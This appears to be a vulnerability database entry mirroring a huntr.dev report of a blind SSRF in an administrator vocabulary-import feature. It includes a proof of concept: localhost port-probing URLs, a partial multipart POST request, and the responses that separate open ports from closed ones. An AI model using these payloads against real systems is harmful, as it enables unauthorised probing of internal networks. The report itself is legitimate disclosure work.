Lucene search

Scgajge12F5018226-0063-415D-9675-D7E30934FF78

HistoryJul 16, 2023 - 1:53 a.m.

Server Side Request Forgery (SSRF)

2023-07-1601:53:21

scgajge12

www.huntr.dev

blind ssrf

vocabulary screen

administrator

import

payload

request

response result

0.0005 Low

EPSS

Percentile

18.1%

JSON

Description

There is Blind SSRF on the vocabulary screen in the administrator screen.

Proof of Concept

Step 1. Log in to the administrator screen and access “Import new vocabulary” from the “vocabulary” page.
Step 2. Specify the following Payload in the “Vocabulary URL” field and check that the local environment can be accessed from the response result. (File format: JSON-LD)

Payload

Open Port

http://localhost:80

Open Port

http://localhost:443

Closed Port

http://localhost:1234

Request

POST /admin/vocabulary/import HTTP/1.1
 ...

-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[url]"

http://localhost:80
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[format]"

jsonld
-----------------------------28807843559236410972421406436
 ...

Response Result

Open Port

Unable to load the remote document "&lt;!DOCTYPE html  ...

Closed Port

Unable to connect to localhost:1234 (Connection refused)

PoC Video

https://drive.google.com/file/d/10SmI9dtRewubES4kRHHk2xyupG_GxLF5/view?usp=sharing

References

cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/

0.0005 Low

EPSS

Percentile

18.1%

JSON

Related for F5018226-0063-415D-9675-D7E30934FF78